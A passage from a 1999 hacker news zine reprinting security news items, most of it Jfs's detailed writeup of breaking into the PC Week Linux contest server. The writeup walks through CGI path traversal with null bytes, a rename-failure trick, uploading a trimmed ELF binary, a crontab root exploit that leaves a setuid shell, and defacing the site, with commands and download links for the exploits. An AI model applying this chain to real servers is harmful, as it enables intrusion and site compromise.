The TCP/IP protocol suite, which is widely used today, was developed under the sponsorship of the Department of Defense. Despite that, there are a number of serious security flaws inherent in the protocols, regardless of the correctness of any implementations. We describe a variety of attacks based on these flaws, including sequence number spoofing, routing attacks, source address spoofing, and authentication attacks. We also present defenses against these attacks, and conclude with a discussion of broad-spectrum defenses such as encryption. copyright (c) SLa5H ,member of HWA.hax0r.news @HWA 19.0 ACTIVE X TROJAN ~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by BHZ, Sunday 25th September 1999 on 8:35 pm CET TL security published information about ActiveX trojan. "The shareme activex trojan writes two .reg files. Then runs them in order. The first file enables file sharinghe second shares out the targets hard drive with hiddennames like top-d$, top-f$, etc. These two reg files are then run in order. The system would take these changes into effect after the next reboot." Contributed by Thierry @HWA 20.0 ANALYSYS BY JFS - The PCWeek hack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by BHZ, Sunday 25th September 1999 on 8:15 pm CET Mentes Inquietas, !Hispahack webzine has the story by Jfs about getting into linux part of PC Week cracking contest. In it his explains every step he did until he succeeded. http://hispahack.ccc.de/en/mi019en.htm A practical vulnerability analysis (The PcWeek crack) By Jfs First of all, I had to gather information on the remote host, what ports the machine had open and what possibilities were left open. After checking that most of the ports were either filtered by the firewall or unusable due to the tcp wrapper in the host, I decided that I was left only with the HTTP server. lemming:~# telnet securelinux.hackpcweek.com 80 Trying 208.184.64.170... Connected to securelinux.hackpcweek.com. Escape character is '^]'. POST X HTTP/1.0 HTTP/1.1 400 Bad Request Date: Fri, 24 Sep 1999 23:42:15 GMT Server: Apache/1.3.6 (Unix) (Red Hat/Linux) (...) Connection closed by foreign host. lemming:~# So, it was running apache on a Red Hat box. The webpage said that the server will also run mod_perl, but mod_perl leaves a fingerprint in the Server: header which was not shown in the header that this server sent out. Apache 1.3.6 doesn't ship with any CGI programs available to the remote user, but I didn't know about the RH distro, so I gave the common faulty CGIs a try (test-cgi, wwwboard, Count.cgi...) After no results, I tried to find out what the website structure was, gathering information from the HTML pages, I found out that the server had this directories under the DocumentRoot of the website: / /cgi-bin /photoads/ /photoads/cgi-bin So I got interested in the photoads thingie, which seemed like an installable package to me. After some searching on the WWW I found out that photoads was a commercial CGI package from "The Home Office Online" (http://www.hoffice.com). It sells for $149, and they grant you access to the source code (Perl), so that you can check and modify it. I asked a friend if he would let me gave a look at his photoad installation and this is how I got access to a copy of what could be running in the securelinux machine. I checked the default installation files and I was able to retrieve the ads database (stored in the http://securelinux.hackpcweek.com/photoads/ads_data.pl) with all the user passwords for their ads. I also tried to access the configuration file /photoads/cgi-bin/photo_cfg.pl but because of the server setup I couldn't get it. I got the /photoads/cgi-bin/env.cgi script (similar to test-cgi) to give me details of the server such as the location in the filesystem of the DocumentRoot (/home/httpd/html) apart from other interesting data (user the server runs as, in this case nobody). So, first things first, I was trying to exploit either SSI (Server side includes) or the mod_perl HTML-embedded commands, which look something like: <!--#include file="..."--> for SSI <!--#perl ...--> for mod_perl The scripts filtered thsi input on most of the fields, through a perl regexp that didn't leave you with much room to exploit. But I also found a user assigned variable that wasn't checked for strange values before making it into the HTML code, which will let me embed the commands inside the HTML for server side parsing: In post.cgi, line 36: print "you are trying to post an AD from another URL:<b> $ENV{'HTTP_REFERER'}\n"; The $ENV{'HTTP_REFERER'} is a user provided variable (though you have to know a bit of how HTTP headers work in order to get it right), which will allow us to embed any HTML into the code, regardless of what the data looks like. Refer to the files getit.ssi and getit.mod_perl for the actual exploit. To exploit it, do something like: lemming:~# cat getit.ssi | nc securelinux.hackpcweek.com 80 But unfortunately, the host didn't have SSI nor mod_perl configured, so I hit a dead end. I decided to find a hole in the CGI scripts. Most of the holes in perl scripts are found in open(), system() or `` calls. The first allows reading, writing and executing, while the last two allow execution. There were no occurrences of the last two, but there were a few of the open() call: lemming:~/photoads/cgi-bin# grep 'open.*(.*)' *cgi | more advisory.cgi: open (DATA, "$BaseDir/$DataFile"); edit.cgi: open (DATA, ">$BaseDir/$DataFile"); edit.cgi: open(MAIL, "|$mailprog -t") || die "Can't open $mailprog!\n"; photo.cgi: open(ULFD,">$write_file") || die show_upload_failed("$write_file $!"); photo.cgi: open ( FILE, $filename ); (...) There was nothing to do with the ones referring to $BaseDir and $DataFile as these were defined in the config file and couldn't be changed in runtime. Same for the $mailprog. But the other two lines are juicier... In photo.,cgi, line 132: $write_file = $Upload_Dir.$filename; open(ULFD,">$write_file") || die show_upload_failed("$write_file $!"); print ULFD $UPLOAD{'FILE_CONTENT'}; close(ULFD); So if we are able to modify the $write_file variable we will be able write to any file in the filesystem. The $write_file variable comes from: $write_file = $Upload_Dir.$filename; $Upload_Dir is defined in the config file, so we can't change it, but what about $filename? In photo.cgim line 226: if( !$UPLOAD{'FILE_NAME'} ) { show_file_not_found(); } $filename = lc($UPLOAD{'FILE_NAME'}); $filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/; if ($filename =~ m/gif/) { $type = '.gif'; }elsif ($filename =~ m/jpg/) { $type = '.jpg'; }else{ {&Not_Valid_Image} } So the variable comes from $UPLOAD{'FILE_NAME'} (extracted from the variables sent to the CGI by the form). We see a regexp that $filename must match in order to help us get where we want to get, so we can't just sent any file we want to, e.g. "../../../../../../../../etc/passwd", cos it will get nulled out by the substitution : $filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/; We see, if the $filename matches the regexp, it's turned to ascii 1 (SOH). Apart from this, $filename must contain "gif" or "jpg" in its name in order to pass the Not_Valid_Image filter. So, after playing a bit with various approaches and with a bit of help from Phrack's last article on Perl CGI security we find that /jfs/\../../../../../../../export/www/htdocs/index.html%00.gif should allow us to refer to the index.html file (the one we have to modify, the main page in the web server). But then, in order to upload we still need to fool some more script code... We notice that we won't be able to fool the filename if we send the form in a POST (the %00 doesn't get translated), so we are left out with only a GET. In photo.cgi, line 256, we can see that some checks are done in the actual content of the file we just uploaded (:O) and that if the file doesn't comply with some specifications (basically width/length/size) of the image (remember, the photo.cgi script was supposed to be used as a method to upload a photoad to be bound to your AD). If we don't comply with these details the script will delete the file we just uploaded (or overwritten), and that's not what we want (at least not if we want to leave our details somewhere in the server :). PCWeek has the ImageSize in the configuration file set to 0, so we can forget about the JPG part of the function. Let's concentrate on the GIF branch: if ( substr ( $filename, -4, 4 ) eq ".gif" ) { open ( FILE, $filename ); my $head; my $gHeadFmt = "A6vvb8CC"; my $pictDescFmt = "vvvvb8"; read FILE, $head, 13; (my $GIF8xa, $width, $height, my $resFlags, my $bgColor, my $w2h) = unpack $gHeadFmt, $head; close FILE; $PhotoWidth = $width; $PhotoHeight = $height; $PhotoSize = $size; return; } and in photo.cgi, line 140: if (($PhotoWidth eq "") || ($PhotoWidth > '700')) { {&Not_Valid_Image} } if ($PhotoWidth > $ImgWidth || $PhotoHeight > $ImgHeight) { {&Height_Width} } So we have to make the $PhotoWidth less than 700, different from "" and smaller than ImgWidth (350 by default). So we are left with $PhotoWidth != "" && $PhotoWidth < 350 . For $PhotoHeight it has to be smaller than $ImgHeight (250 by default). So, $PhotoWidth == $PhotoHeight == 0 will do for us. Looking at the script that gets the values into those variables, the only thing we have to do is to set the values in the 6th to 9th byte to ascii 0 (NUL). We make sure that we put our FILE_CONTENT to comply with that and proceed with the next problem in the code... chmod 0755, $Upload_Dir.$filename; $newname = $AdNum; rename("$write_file", "$Upload_Dir/$newname"); Show_Upload_Success($write_file); Argh!!! After all this hassle and the file gets renamed/moved to somewhere we don't want it to be :( Checking the $AdNum variable that gives the final location its name we see that it can only contain digits: $UPLOAD{'AdNum'} =~ tr/0-9//cd; $UPLOAD{'Password'} =~ tr/a-zA-Z0-9!+&#%$@*//cd; $AdNum = $UPLOAD{'AdNum'}; Anything else gets removed, so we can't play with the ../../../ trick in here anymore :| So, what can we do? The rename() function expects us to give him two paths, the old one and the new one... wait, there is no error checking on the function, so if it fails it'll just keep on processing the next line. How can we make it fail? using a bad file name. Linux kernel has got a restriction on how long a file can be, defaults to 1024 (MAX_PATH_LEN), so if we can make the script rename our file to something longer than 1024 bytes, we'll have it! :) So, next step we pass it a _really large_ AD number, approximately 1024 bytes long. Now, the script won't allow us to process the script as it only allows us to post photos for ADs number that do exist... and it will take us a hell of a lot of time to create taht many messages in the board 10^1024 seems quite a long time to me :) So... another dead end? Nah, the faulty input checking functions let us create an add with the number we prefer. Just browse through the edit.cgi script and think what will happen if you enter a name that has a carriage return in between, then a 1024 digits number? :) We got it... Check the long.adnum file for an exploit that gets us the new ad created. So, after we can fool the AdNum check, the script makes what we do, that is: Create/overwrite any file with nobody's permissions, and with the contents that we want (except for the GIF header NULs). So, let's try it Check the overwrite.as.nobody script that allows us to do that. So far so good. So, we adjust the script to overwrite the index.html web page... and it doesn't work. Duh :( It's probably that we didn't have the permission to overwrite that file (it's owned by root or it's not the right mode to overwrite it). So, what do we do now? Let's try a different approach... We try to overwrite a CGI and see it we can make it run for us :) This way we can search for the "top secret" file and we'll get the prize anyway :) We modify the overwrite script, and yes, it allows us to overwrite a CGI! :) We make sure we don't overwrite any important (exploit-wise) CGI and we choose the advisory.cgi (what does it do anyway? :)). So, we will upload a shell script that will allow us to execute commands, cool... But then, when you run a shell script as a CGI, you need to specify the shell in the first line of the script, as in: #!/bin/sh echo "Content-type: text/html" find / "*secret*" -print And remember, our 6th, 7th, 8th and 9th bytes had to be 0 or a very small value in order to comply with the size specifications... #!/bi\00\00\00\00n/sh That doesn't work, the kernel only reads the first 5 bytes, then tries to execute "#!/bi"... and as far as I know there is no shell we can access that fits in 3 bytes (+2 for the #!). Another dead end... Looking at an ELF (linux default executable type) binary gives us the answer, as it results that those bytes are set to 0x00, yohoo :) So we need to get an ELF executable into the file in the remote server. We have to url-encode it as we can only use GETs, not POSTs, and thus we are limited to a maximum URI length. The default maximum URI length for Apache is 8190 bytes. Remember that we had a _very long_ ad number of 1024 characters, so we are left with about 7000 bytes for our URL-encoded ELF program. So, this little program: lemming:~/pcweek/hack/POST# cat fin.c #include <stdio.h> main() { printf("Content-type: text/html\n\n\r"); fflush(stdout); execlp("/usr/bin/find","find","/",0); } compiled gives us: lemming:~/pcweek/hack/POST# ls -l fin -rwxr-xr-x 1 root root 4280 Sep 25 04:18 fin* And stripping the symbols: lemming:~/pcweek/hack/POST# strip fin lemming:~/pcweek/hack/POST# ls -l fin -rwxr-xr-x 1 root root 2812 Sep 25 04:18 fin* lemming:~/pcweek/hack/POST# Then URL-encoding it: lemming:~/pcweek/hack/POST# ./to_url < fin > fin.url lemming:~/pcweek/hack/POST# ls -l fin.url -rw-r--r-- 1 root root 7602 Sep 25 04:20 fin.url Which is TOO large for us to use in our script :( so, we edit the binary by hand using our intuition and decide to delete everything after the "GCC" string in the executable. It's not a very academic approach and probably it'll pay to check the ELF specifications, but hey, it seems to work: lemming:~/pcweek/hack/POST# joe fin lemming:~/pcweek/hack/POST# ls -l fin -rwxr-xr-x 1 root root 1693 Sep 25 04:22 fin* lemming:~/pcweek/hack/POST# ./to_url < fin > fin.url lemming:~/pcweek/hack/POST# ls -l fin.url -rw-r--r-- 1 root root 4535 Sep 25 04:22 fin.url lemming:~/pcweek/hack/POST# Now, we incorporate this into our exploit, and run it... Check the file called get.sec.find in the files directory for more info. Also there you will find the to_url script and some .c files with basic commands to run along with their URL translations and finished exploits. So, we upload the CGI, and access it with our favorite browser, in this case: wget http://securelinux.hackpcweek.com/photoads/cgi-bin/advisory.cgi Which gives us a completed find / of the server :) Unfortunately, either the "top secret" file is not there, or it is not accessible by the nobody user :( We try some more combinations as locate, ls and others, but no traces of the "top secret" file. [ I wonder where it was after all, if it ever existed ] So, time to get serious and get root. As a friend of mine says, why try to reinvent the wheel, if it's already there. So with our data about the server (Linux, i386 since my computer is an i386 and the ELFs ran as a charm...) we grep the local exploit database and find a nice exploit for all versions of RH's crontab. Available on your nearest bugtraq/securityfocus store :) kudos to w00w00 for this We modify it to tailor our needs, as we won't need an interactive rootshell, but to create a suidroot shell in some place accessible by the user nobody. We tailor it to point to /tmp/.bs. We upload the CGI again, run it with our browser, and we are ready to see if the exploit runs fine. We make a CGI that will ls /tmp and yeah, first try and we have the suitroot waiting for us :) We upload a file to /tmp/xx with the modified index.html page. Time to make a program that will run: execlp("/tmp/.bs","ls","-c","cp /tmp/xx /home/httpd/html/index.html",0); And at this point the game is over :) It's been around 20hours since we started, good timing 8) We then upload and copy our details to a secure place where nobody will see them, and post a message in the forum waiting for replies :) ( Download PCWEEK.ZIP to get the xploits and scripts used. ) Jfs - !H'99 jfs@gibnet.gi http://hispahack.ccc.de The PCWEEK.ZIP archive contains the following: Archive: ../pcweek.zip Length Method Size Ratio Date Time CRC-32 Name ------ ------ ---- ----- ---- ---- ------ ---- 567 Defl:N 334 41% 09-25-99 03:07 71a5491c getit.mod_perl 301 Defl:N 220 27% 09-25-99 03:07 99acc702 getit.ssi 1725 Defl:N 961 44% 09-25-99 04:36 409dbafd cp 1344 Defl:N 195 86% 09-25-99 03:55 bf129429 long.adnum 1482 Defl:N 273 82% 09-25-99 04:00 45eabccf overwrite.as.nobody 173 Defl:N 139 20% 09-25-99 04:36 2b8077da cp.c 4589 Defl:N 1130 75% 09-25-99 04:36 1eaeebae cp.url 1737 Defl:N 970 44% 09-25-99 04:36 c3b5d4c0 cp2 182 Defl:N 152 17% 09-25-99 04:36 96ef4516 cp2.c 4607 Defl:N 1136 75% 09-25-99 04:36 ced63691 cp2.url 2197 Defl:N 1232 44% 09-25-99 04:36 a8f288ca cr 1153 Defl:N 506 56% 09-25-99 04:36 ddb6ad31 cr.c 5729 Defl:N 1456 75% 09-25-99 04:36 920e86f7 cr.url 5838 Defl:N 1313 78% 09-25-99 04:36 26a419fe fes.cp 5856 Defl:N 1319 78% 09-25-99 04:36 ed441d3c fes.cp2 6976 Defl:N 1640 77% 09-25-99 04:36 b4bb0f1f fes.cr 1288 Defl:N 187 86% 09-25-99 04:36 ea735eab fes.delete 5722 Defl:N 1284 78% 09-25-99 04:36 e9ff4a66 fes.fil 5790 Defl:N 1292 78% 09-25-99 04:36 86962231 fes.ls 180 Defl:N 125 31% 09-25-99 04:36 0487481d fes.pl 1685 Defl:N 948 44% 09-25-99 04:36 0e839e45 fil 177 Defl:N 150 15% 09-25-99 04:36 ff116487 fil.c 4473 Defl:N 1097 76% 09-25-99 04:36 85c66ba0 fil.url 1693 Defl:N 943 44% 09-25-99 04:36 9d149df6 ls 136 Defl:N 121 11% 09-25-99 04:36 69182852 ls.c 4541 Defl:N 1106 76% 09-25-99 04:36 64756e15 ls.url ------ ------ --- ------- 70141 20229 71% 26 You can get this from : http://hispahack.ccc.de/programas/pcweek.zip @HWA 21.0 CALCULATOR IN THE URL ~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by BHZ, Saturday 24th September 1999 on 8:15 pm CET This is a cool address picked up by Newstrolls (www.newstrolls.com). As the page says: "The urlcalculator demonstrates the weirdest URL-tricks. YOU change the hostname to the function and arguments you want; and you get the result on the homepage of the site". Visit the help for calculator-in-the-URL on the following address: http://$urlcalc(help).x42.com @HWA 22.0 W97M_SUPPL ~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by BHZ, Saturday 24th September 1999 on 7:43 pm CET Trend Micro found another macro virus in the wild. This new virus is distributed via e-mail in an empty Word 97 document. Upon opening the SUPPL.DOC file, W97M_SUPPL activates and copies itself to the Windows directory (as ANTHRAX.INI). Once an infected system is rebooted, TROJ_SUPPL starts to spread itself by attaching the SUPPL.DOC file to every outgoing message. After a system has been infected for 163 hours, TROJ_SUPPL runs its destructive payload, which tries to open all files with the .DOC, .XLS, .TXT, .RTF, .DBF, .ZIP, .ARJ and .RAR extentions and truncate them. www.antivirus.com @HWA 23.0 WHO IS TO "BLAME" ~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by BHZ, Saturday 24th September 1999 on 7:23 pm CET After the Secure Linux part of the PC Week cracking contest was compromised, hacker who was successful in it spoke on forum over there: "I suppose it's not Linux who should get blamed but the company that _sells_ CGI scripts with improper security checks. This applies to Unix, NT or whatever other operating system you are running. The problem here, IMHO, is that the CGIs used were not open source. I'm sure that if they had been open source somebody out there will have done a security audit on them and patched the holes". @HWA 24.0 LPAZ DEFACED ~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by BHZ, Saturday 24th September 1999 on 7:12 pm CET Web site of The Arizona Libertorian Party has been compromised today. As posted on defaced mailing list on Attrition, Jericho said "The 'lpaz' hack is interesting. No elite speak, no cussing. A seemingly true political hack." Archive of the hack here http://www.attrition.org/mirror/attrition/1999/09/24/www.lpaz.org/ @HWA 25.0 VIRUS WRITING OUTLAWED ~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Friday 23rd September 1999 on 1:25 am CET On Wednesday Parliament approved an amendment to Finnish criminal legislation that will make the writing and spreading of computer viruses punishable under law. Under the terms of the new law the writing, making available, or spreading computer viruses will be punishable by fines or by prison terms of up to two years. http://www.helsinki-hs.net/today/230999-05.html Virus spreaders to feel the long arm of the law On Wednesday Parliament approved an amendment to Finnish criminal legislation that will make the writing and spreading of computer viruses punishable under law. The decisive second reading of the Bill cites the offence as a catch-all "Causing danger to data processing systems". Under the terms of the new law this will be punishable by fines or by prison terms of up to two years. It is hoped to get the amendment into law as quickly as possible. The law stretches a net to catch those writing, making available, or spreading computer viruses. This effectively means for example that anyone who keeps a virus program on their website that is available for downloading by visitors would become liable under the law. Liability for punishment is not limited to cases in which actual harm or hindrance is caused to data systems, or where the data or files of the infected system are corrupted or destroyed in the process. The intention to harm becomes the primary criteria for bringing charges, and this allows the authorities to bring offenders to book even if the virus is caught before it has a chance to operate. Under current Finnish law there is no official sanction for the making and disseminating of computer viruses, although there have been prosecutions in cases where an activated virus has caused damage. @HWA 26.0 NETWARE 5 BUG STRIKES NSS USERS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Friday 23rd September 1999 on 1:10 am CET Novell on Wednesday released an updated and debugged version of Support Pack 3, called Support Pack 3A, to fix a potentially crippling data-loss problem tied to the original support pack. Users of Novell Storage Services (NSS) found themselves in trouble after downloading Support Pack 3 which contained a bug which was destroying their NetWare 5 volumes. Novell suggested that users who have not yet downloaded the support pack get the new Support Pack 3A, while those who already have Support Pack 3 get the bug-fixing patch. More info http://www.infoworld.com/cgi-bin/displayStory.pl?990922.hnnovellbug.htm NetWare 5 bug strikes NSS users By Stephanie Sanborn InfoWorld Electric Posted at 5:09 PM PT, Sep 22, 1999 Novell on Wednesday released an updated and debugged version of Support Pack 3, called Support Pack 3A, to fix a potentially crippling data-loss problem tied to the original support pack. Users of Novell Storage Services (NSS) found themselves in trouble after downloading Support Pack 3 � a bug was destroying their NetWare 5 volumes. According to Novell officials, upon learning of the bug the company initially created a patch for the support pack, which could be downloaded from the Novell Web site. Support Pack 3 was also removed from the site. In a statement, Sean Sanders, NetWare product marketing manager, and Gary King, a representative from Novell's technical support group, said, "Fortunately, less than 1 percent of NetWare 5 users experienced this [volume-loss] problem. " Novell has now posted Support Pack 3A, which it declared is free of the volume-destroying glitch. " [IT managers] should immediately patch this thing, " said Eric J. Bowden, general manager at BugNet, in Lindon, Utah. "Go to Support Pack 3A and bypass 3.0." Novell suggested that users who have not yet downloaded the support pack get the new Support Pack 3A, while those who already have Support Pack 3 get the bug-fixing patch. "That was a pretty critical bug for people who have installed NSS, " Bowden said. "Catastrophic bugs usually get the most press, and there aren�t that many that can wipe out your file system. This one has the capability of wiping out your file system. " However, Novell officials said that if a customer runs into the data-loss bug, they should immediately contact Novell technical support officials, who can recreate the volumes and recover data. "The best advice I can give is don�t panic, but make informed decisions as you apply these patches, " Bowden added. NetWare 5 patches and Support Pack 3A are available at www.support.novell.com. Novell, Inc., in Provo, Utah, is at www.novell.com. Stephanie Sanborn is an InfoWorld reporter. Additional reporting by Matthew Nelson, an InfoWorld senior writer. @HWA 27.0 TAGGED STUDENTS DEFY BIG BROTHER ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Friday 23rd September 1999 on 0:25 am CET Hundreds of students in this little town don't want to wear their Social Security numbers around their necks for all to see. When the school year began a few weeks ago, the students at Ruston High School, like many students across the nation, were required to wear an ID badge as part of added security precautions. The badges in Ruston include each student's Social Security number, a violation of federal law according to two students. Although administrators claim the number is protected from unauthorized use through encryption in the barcode, the students already cracked the code. http://www.worldnetdaily.com/bluesky_bresnahan/19990923_xex_tagged_stude.shtml YOUR PAPERS, PLEASE Tagged students defy Big Brother Reject being forced to wear Social Security numbers By David M. Bresnahan � 1999 WorldNetDaily.com RUSTON, Louisiana -- Hundreds of students in this little town don't want to wear their Social Security numbers around their necks for all to see. Their school administrators have ignored their complaints even though their numbers are growing. When the school year began a few weeks ago, the students at Ruston High School, like many students across the nation, were required to wear an ID badge as part of added security precautions. The badges in Ruston include each student's Social Security number, a violation of federal law according to two students. The badges are worn on a lanyard with the Pepsi logo on it. The badge has a photo of the student, the school name, the student's name, and a barcode which represents the Social Security number. Although administrators claim the number is protected from unauthorized use through encryption in the barcode, the students know that is not true. To prove how easy it is to read the barcodes, Jonathan Washington, 16, reads any barcode in about 15 seconds. He tells other students their Social Security number and then asks them to sign his petition to have the cards changed. His methods are convincing. Over 350 students have signed in just the first few days. Rachel Winchel, 16, another Ruston student, is helping to spread the protest and circulate the petition. "We just aren't taught code 39 barcode encryption in school. It's just another system that is easily learned. It's not that hard," explained Washington to WorldNetDaily. He has created an Internet web page to teach others how to read the cards. Washington and Winchel are also concerned that a student from the school did the work to enter all the Social Security numbers into the computer that was used to make the cards. They said little or no security was used to protect the numbers from unauthorized use. "Parents should have some concern because their children's Social Security numbers are linked directly to theirs in all financial records. If you have a child's you can get the parents'. It's a financial jeopardy to just about everyone in school," complained Washington. He said his concern is a philosophical one, not religious. Winchel is of a different opinion. "I have religious and moral convictions behind what they're doing as it being wrong. It's totally appalling," she said in a phone interview. "I'm a person that's made by God and I'm not a number. I'm more special than that. I do believe that it's religiously wrong. I don't want to be branded and labeled as livestock. We're more special than that," said Winchel. Washington is opposed to ID cards in general and does not want his Social Security number displayed for all to see, nor does he want it to be in school computers. His parents are seeking legal counsel and have not ruled out a lawsuit. The parents of both Washington and Winchel expressed complete support for what their children are doing. Dr. Charles Scriber is principal of the school. Although he met with Washington and his parents, he has ignored a written complaint from Winchel and her mother. He has not granted a written request for an appointment to discuss her concerns. In an interview with WorldNetDaily he defended the practice and claims the cards are legal. He said he has no plans to change the cards. Since the faculty and administration also wear the cards, students are busy taking down their Social Security numbers with plans to publish the results on the Internet if the cards are not discontinued. "Actually, it's not difficult to look at it and know what it means," explained Winchel. "There's narrow bars and there's wide bars. Each number zero through nine has a code. By memorizing the code for the number zero through nine, you can just glance at someone's card and the numbers just pop out. "Many kids at school can do it, and it doesn't take very long to even learn. That's why it concerned me because it's very easy to learn," she explained. Winchel and Washington have cut the barcode from their cards. Amanda Winchel, Rachel's younger sister, changed her card. She painted over the barcode then created a new one which represents the number 911. Winchel and Washington have now stopped wearing their cards, but they have not been disciplined for doing so. Their actions could lead to expulsion from school, but that is a risk they are willing to take to stand up for what they believe is right. The Ruston High School Student Handbook detail the rules regarding the cards and spells out the possible penalties for infractions. Washington's complaints to Dr. Scriber produced a sudden change in policy in the past few days. The librarian was told to remove Washington's Social Security number from the library computer which reads the barcodes. A new card has not been issued, and the cafeteria computer has not been changed. "He thought that would get me to leave him alone about it," said Washington, who has vowed to continue his fight. He will not be satisfied until the cards are completely changed for all students. If the change is not made he expects to take the school to court for civil damages. The school has always had an ID card, but past cards were much different. They did not contain a Social Security number, nor were they worn. Students were only required to present the card when requested to do so. The new policy was instituted in response to the numerous shootings at schools around the country. Many schools now require ID cards to be worn as a security measure. Winchel and Washington both claim the ID badge will not stop a potential killer. "If anything, they are just good identification for when you get shot at school so your parents can come and see your ID badge when your body is mutilated. I don't see how this would effect security in any way at all," exclaimed Winchel. "It would not prevent a school shooting at all. The ID badge does not change the mindset of the killers," she added. She also pointed out that the shootings at many schools have been by students who would be wearing a badge if their school had the same policy. Winchel would object to the card even if the barcode and Social Security number are no longer displayed. She does not want her Social Security number to even be in the school computer system. "I'm not wearing mine because I'm tired of all of this nonsense," she said. "I shouldn't have to wear it. I'm a student. I shouldn't be treated as if I'm a felon. I have done nothing wrong. I am not going to wear my ID badge any longer at school. It's not necessary or relevant to get an education." Although teachers are required to report a student without a badge, Washington and Winchel have not had any action taken against them for their defiance. Winchel says at least 350 of the approximately 1,200 students have signed their petition. She believes more would sign if it were not for the intimidating announcements made over the school loud speakers each morning. Students are warned not to deface the cards or to be in school without them. Disciplinary action on a school record could prevent college acceptance in later years, so Winchel says many students are hesitant to be supportive. "Honestly, they are very scared to do anything, and I don't blame them. When you have the school telling you that you're going to get detention or suspension for not wearing your ID badge. While they support this they don't want to be suspended either," she explained. Both Winchel and Washington plan to meet with the school board if the principal fails to resolve the situation. The petition signed by the students states: "The students of Ruston High who have signed below realize that the barcode on each student's ID badge is that student's Social Security number. They also realize that their Social Security number may not be used in this manner and request that they be assigned a generic number as a barcode." Tagged students defy big brother, Part 2 By David M. Bresnahan � 1999 WorldNetDaily.com Students at Louisiana's Ruston High School continue to protest the use of ID badges displaying their Social Security numbers, one parent is threatening a federal criminal complaint, and the man who programmed the computers involved has given advice to the students -- become an administrative headache. (See part one, Tagged students defy Big Brother in yesterday's WND.) Each student in Louisiana, whether they know it or not, has a state student ID number. That number by default is also their Social Security number. Parents can object and require the school to use a different number. "Students' parents can request a new state identification number if they object to use of the Social Security number," advised Eric L. Green, who was formerly contracted to install and administer the computers at Ruston High School "The school is required to issue such a number if requested. This is by both state law and school district policy," he explained to WorldNetDaily. "This is the best form of civil disobedience. It causes a serious administrative headache and gives them great incentive to change the policy. It also directly involves district personnel, who, when inconvenienced, are likely to go to the superintendent's office and say 'This policy must be changed.'" Students who have been protesting the new requirement to wear an ID badge displaying their Social Security number have refused to wear the controversial badges. Jonathan Washington was made to wear a temporary red badge on Thursday. "I wore it for five minutes, then took it off," said Washington, 15. He said he did not wear a badge for the rest of the day. Others have begun to follow Washington's lead. Indeed, he has obtained hundreds of signatures of students supporting a petition to remove the Social Security numbers from the badges. The school computers contain each student's Social Security number as well as a specially created student identification number. That number was created to avoid problems with the use of Social Security numbers. "I am mystified why they put the Social Security numbers on the card, rather than the district-assigned seven-digit student identification number," Green told WorldNetDaily. "The district-assigned number was specifically created over seven years ago due to concerns about widespread use of the Social Security numbers, concerns expressed both by Lincoln Parish School Board district officials and by other school officials state-wide. "The student identification number can be queried out of the Student Information Systems database just as easily as the Social Security number. The only thing that I can think of is that the placard-generating software they used had a nine-digit space for student ID number, and they were too stupid to figure out how to put a seven-digit number into that space," he explained from Arizona where he now lives. Green was paid as a consultant to install the current computer system at Ruston High School, and spent two years supervising the transfer of data from those computers to the school district and to the state computers in Baton Rouge. Green also transferred data from the school lunch program computers to the federal government. "The only system I know of that must use the federal Social Security number is the lunch system, where various anti-fraud laws require them to submit the data to the feds and the feds then match it against the food stamp rosters," Green explained. The computers do not print out Social Security numbers on any reports, except for reports required by state and federal agencies. Reports used by the school system default to the student identification number, which is seven digits instead of the nine used by the Social Security number. "I have no idea why other software vendors did not adopt such a solution to privacy concerns with the Social Security number, just as I have no idea why the administration at Ruston High School chose to use a number that their administrative software vendor had been specifically told (by the school district) not to use as a publicly reported piece of data, due to privacy concerns," Green stated. "At this point, I have discussed the legal ramifications of this with the principal and an assistant superintendent who has gotten a legal opinion, albeit I think flawed, from a lawyer that represents them," said Paul Washington, father of Jonathan, in a phone interview with WorldNetDaily. "My feeling is that my next move is to either contact the federal authorities, or institute a lawsuit on my own. Either way, I am getting very close to instituting legal action one way or the other." Washington said he hopes the school officials will change the ID cards before he is forced to take legal action to intervene. He has asked the principal to have the barcodes cut off the cards, but principal Dr. Charles Scriber has refused to make any changes. "If they do not back down before I file, it is going to raise the stakes," explained Washington of his expectation that he will seek monetary damages. "If they were to back down tomorrow, which is really what I have been after all along, I would say 'great' and let it go," he offered. Washington's son and hundreds of other students are objecting to the fact that their new ID badges display their Social Security numbers, and they are required to wear the badges at all times. Anyone could copy down the numbers and use them improperly. Washington described how easy it is to look at the barcode and translate it into the actual numeric Social Security number. He even published a web site that teaches others to do it. He and Rachel Winchel have led a student protest and petition drive in an effort to end the practice. "We have been very supportive of what his position is, and are encouraging him to proceed in a legal and very appropriate way. When suggestions have been made which we consider to be inappropriate, we explain why," said Washington of his son's protest. Scriber claims the barcode is a form of encryption and therefore the Social Security number is not actually displayed for all to see. "The barcode, in my opinion, is just an alternate means for writing the number. They claim encryption � well, encryption can only be considered as long as nobody can read it," said Washington. His son and other students can demonstrate their ability to read any barcode in a matter of seconds on sight. "Philosophically, I am opposed to the wearing of name tags, but I would not fight that legally if it were not for the presence of the Social Security number on there. There is a level of effort that is required to fight this, and if it's just over the wearing of a name tag, then I'm not going to go to that level of effort," explained Washington. Student ID badges have been moved from wallets to being worn visibly by many schools across the nation in an effort to increase security after a rash of school shootings. Washington and the students do not believe the badges at Ruston High School contribute to their safety. "This makes absolutely no educational sense. The level of security they are providing with the name tags is zero. The thing that really bothers me is when they gave out the name tags, they gave them out with this whistle cord strap to hang them on. So what you've done is hang a rope around the neck of all the highschoolers, and told them to walk through the halls with a rope around your neck," said Washington. "They have been pulling on them and one of these days someone's going to get seriously hurt. I would hate to be the attorney trying to defend the action of the school in encouraging, if not requiring them, to wear this rope around their neck when somebody gets hurt by it. It's just stupid. It's obvious that there is going to be a problem sooner or later." Green, a professor at a local college, believes all schools are filled with inept bureaucrats who make unwise decisions, and he blamed 